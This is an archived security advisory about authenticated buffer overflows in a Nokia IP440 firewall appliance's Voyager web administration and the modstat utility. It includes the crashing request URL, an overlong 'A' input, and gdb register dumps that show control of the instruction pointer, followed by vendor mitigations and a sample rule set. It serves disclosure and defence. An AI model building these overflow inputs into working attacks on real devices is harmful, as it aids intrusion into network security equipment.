COMMAND
Nokia firewalls
SYSTEMS AFFECTED
Nokia firewalls
PROBLEM
'K2' found following. He unwrapped his shiny new Nokia IP440
integrated Firewall-1/IDS appliance and thought to give it a once
over. It appears to be a older FreeBSD kernel + some firewall
(checkpoint 4.1) + some IDS (ISS) + remote admin (SSH/http).
Now these vulnerabilities all require an authenticated user,
however, it's still amazing that a device with security as it's
primary function would have so many issues.
A request to it's default http administration site...
http://127.0.0.1/cgi-bin/html_page?(Ax6000)&TEMPLATE=main
will result in "Html_gen exited because of signal: Segmentation
fault". After this, any attempt to connect to the site will
return, "Error while getting page: Couldn't connect to /tmp/xsets:
No such file or directory"
The /bin/xpand will die, dumping core in /var/tmp...
scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
Modified in 1997, 1998 by Nokia IP Inc.
There is absolutely no warranty for GDB; type "show warranty" for
details.
GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software
Foundation, Inc.
Core was generated by `xpand'.
Program terminated with signal 11, Segmentation fault.
#0 0x10046fb6 in ??
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
(gdb) file xpand-11.27.2000-094458
Reading symbols from xpand-11.27.2000-094458...done.
(gdb) bt
#0 0x10046fb6 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#1 0xefbfd3b8 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#2 0x10047110 in end
(7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40)
#3 0x10044233 in end
(7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0)
#4 0x100446df in end
(5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020,
efbfd444)
#5 0x1004416c in end
(3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c)
#6 0x1004732e in end
(321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c,
10044713)
#7 0x100441ac in end
(332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983)
#8 0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0)
#9 0x21983 in handle_template_request (d=0x34000,
request=0x66000 "USER admin\n", 'A' <repeats 189 times>...,
request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at
xcommit.c:1053
#10 0x22d6a in stream_set (
fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at
xpand.c:179
#11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0)
#12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d)
---Type <return> to continue, or q <return> to quit---
#13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0,
1)
at xpand.c:385
(gdb) info reg
eax 0x41414141 1094795585
ecx 0x41414141 1094795585
edx 0x0 0
ebx 0x1004f060 268759136
esp 0xefbfd394 0xefbfd394
ebp 0xefbfd394 0xefbfd394
esi 0x7d380 512896
edi 0x41414141 1094795585
eip 0x10046fb6 0x10046fb6
ps 0x10206 66054
cs 0x1f 31
ss 0x27 39
ds 0xefbf0027 -272695257
es 0x80027 524327
(gdb)
also....
scrooge:/var/tmp# gdb -c html_gen.core
(gdb) info reg
eax 0x88dc 35036
ecx 0xfffffffc -4
edx 0x4949 18761
ebx 0x1009b060 269070432
esp 0xefbfaa74 0xefbfaa74
ebp 0xefbfaa84 0xefbfaa84
esi 0x0 0
edi 0x41414141 1094795585
eip 0x10084d1b 0x10084d1b
ps 0x10216 66070
cs 0x1f 31
ss 0x27 39
ds 0x27 39
es 0x27 39
(gdb)
also,
scrooge:/var/tmp# ./modstat -n
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Type Id Off Loadaddr Size Info Rev Module Name
modstat: LMSTAT: Bad file descriptor
Segmentation fault (core dumped)
(gdb) info reg
eax 0x4 4
ecx 0xefbfcfb8 -272642120
edx 0xefbfcfb8 -272642120
ebx 0x0 0
esp 0xefbfd354 0xefbfd354
ebp 0x41414141 0x41414141
esi 0xffffffff -1
edi 0x3 3
eip 0x41414141 0x41414141
This was tested with IPSO scrooge 3.2.1-fcs1 releng 849
11.24.1999-102644 i386 FW-1, 4.1 SP2.
SOLUTION
Nokia is aware of this issue. This is a bug, yes it will be
fixed very quickly but this is not a major vulnerability, you do
need a logon to the box. If this logon was obtained through
covert measures then you have bigger problems than this bug!
Recommendations:
1. Do not allow Voyager access from untrusted networks (e.g.
the Internet).
2. Use good generally accepted practice regarding password
selection and confidentiality (as always).
3. Consider disabling monitor (read-only administrator) access
4. Use the provided SSH with port redirection (IPSO 3.2.1 and
earlier) or embedded SSL (IPSO 3.3 and later) to encrypt
http traffic to Voyager to prevent an attacker from
eavesdropping to hear the password.
A good FireWall-1 rule set to implement recommendations 1-4 might
look something like:
Source / Dest / Service / Action
--------------------------------------------------------------
admin-group / firewalls / [http,] ssh / Accept
management-console / firewalls / fw1-group / Accept
Any / firewalls / Any / Drop
The first rule permits administrative access. The second provides
FireWall-1 management access for the machine acting as the
management console (and is only referenced if Properties have
been modified to no longer accept FireWall-1 Control
Connections). The third excludes all other traffic directly to
the firewalls, and is referred to by Check Point as the "stealth
rule".
With these appropriate rules, an attacker must meet the criteria
established in your FireWall-1 security policy and then also be
authenticated as an administrator before he can attempt to attack
the Voyager-related processes.